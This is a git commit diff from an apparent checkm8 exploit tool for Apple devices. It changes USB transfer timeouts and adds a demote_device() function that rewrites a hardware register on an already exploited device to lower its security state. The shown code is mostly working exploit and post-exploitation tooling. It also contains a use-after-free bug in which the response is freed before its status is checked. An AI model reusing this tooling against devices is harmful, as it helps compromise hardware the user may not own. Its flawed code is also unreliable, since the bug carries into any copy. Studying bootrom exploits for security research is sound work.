grg/checkm8_tool
1
0
Fork 0
Code Issues Pull Requests Releases Wiki Activity

Added demotion capability

Browse Source
This commit is contained in:
Gregor Haas
2020-02-09 11:12:04 -05:00
parent e341d51bf9
commit 79d3b72d15
4 changed files with 315 additions and 17 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
c8_remote/src/command.c
View File

@@ -25,7 +25,7 @@ int dfu_send_data(struct pwned_device *dev, unsigned char *data, long data_len,
checkm8_debug_indent("\tsending chunk of size %li at index %li\n", amount, index);
ret = ctrl_transfer(dev, 0x21, 1, 0, 0, &data[index], amount, 5000, trigger);
ret = ctrl_transfer(dev, 0x21, 1, 0, 0, &data[index], amount, 0, trigger);
if(ret > 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret);
else
{
@@ -71,7 +71,7 @@ struct dev_cmd_resp *command(struct pwned_device *dev,
return cmd_resp;
}
ret = ctrl_transfer(dev, 0x21, 1, 0, 0, nullbuf, 0, 100, 0);
ret = ctrl_transfer(dev, 0x21, 1, 0, 0, nullbuf, 0, 0, 0);
if(ret >= 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret);
else
{
@@ -80,7 +80,7 @@ struct dev_cmd_resp *command(struct pwned_device *dev,
return cmd_resp;
}
ret = ctrl_transfer(dev, 0xA1, 3, 0, 0, nullbuf, 6, 100, 0);
ret = ctrl_transfer(dev, 0xA1, 3, 0, 0, nullbuf, 6, 0, 0);
if(ret >= 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret);
else
{
@@ -89,7 +89,7 @@ struct dev_cmd_resp *command(struct pwned_device *dev,
return cmd_resp;
}
ret = ctrl_transfer(dev, 0xA1, 3, 0, 0, nullbuf, 6, 100, 0);
ret = ctrl_transfer(dev, 0xA1, 3, 0, 0, nullbuf, 6, 0, 0);
if(ret >= 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret);
else
{
@@ -110,7 +110,7 @@ struct dev_cmd_resp *command(struct pwned_device *dev,
ret = ctrl_transfer(dev,
0xA1, 2, 0xFFFF, 0,
resp_buf, response_len + 1,
100, 1);
0, 1);
if(ret >= 0) checkm8_debug_indent("\tfinal request transferred %i bytes\n", ret);
else
{
@@ -124,7 +124,7 @@ struct dev_cmd_resp *command(struct pwned_device *dev,
ret = ctrl_transfer(dev,
0xA1, 2, 0xFFFF, 0,
resp_buf, response_len,
100, 1);
0, 1);
if(ret >= 0) checkm8_debug_indent("\tfinal request transferred %i bytes\n", ret);
else
{

64
c8_remote/src/exploit.c
View File

@@ -1,12 +1,13 @@
#include "checkm8.h"
#include <stdlib.h>
#include "usb_helpers.h"
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include "usb_helpers.h"
#include "command.h"
static unsigned char data_0xA_0xC0_buf[192] =
{
0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA, 0xA,
@@ -289,6 +290,63 @@ struct pwned_device *exploit_device()
}
}
int demote_device(struct pwned_device *dev)
{
checkm8_debug_indent("demote_device(dev = %p)\n", dev);
unsigned int oldval, newval;
struct dev_cmd_resp *resp = dev_read_memory(dev, DEMOTE_REG, 4);
if(IS_CHECKM8_FAIL(resp->ret))
{
free_dev_cmd_resp(resp);
checkm8_debug_block("\tfailed to read demotion reg\n");
return CHECKM8_FAIL_INVARGS;
}
oldval = *((unsigned int *) resp->data);
free_dev_cmd_resp(resp);
if(oldval & 1u)
{
oldval &= 0xFFFFFFFE;
checkm8_debug_indent("\tattempting to demote device\n");
resp = dev_write_memory(dev, DEMOTE_REG, (unsigned char *) &oldval, 4);
free_dev_cmd_resp(resp);
if(IS_CHECKM8_FAIL(resp->ret))
{
checkm8_debug_block("\tfailed to write to demotion reg\n");
return CHECKM8_FAIL_INVARGS;
}
// verify
resp = dev_read_memory(dev, DEMOTE_REG, 4);
if(IS_CHECKM8_FAIL(resp->ret))
{
free_dev_cmd_resp(resp);
checkm8_debug_block("\tfailed to verify demotion reg\n");
return CHECKM8_FAIL_INVARGS;
}
newval = *((unsigned int *) resp->data);
free_dev_cmd_resp(resp);
if(oldval == newval)
{
checkm8_debug_block("\tdemotion success!\n");
return CHECKM8_SUCCESS;
}
else
{
checkm8_debug_block("\tdemotion register did not change!\n");
return CHECKM8_FAIL_INVARGS;
}
}
else
{
checkm8_debug_block("\tdevice already demoted\n");
return CHECKM8_SUCCESS;
}
}
void free_device(struct pwned_device *dev)
{
checkm8_debug_indent("free_device(dev = %p)\n", dev);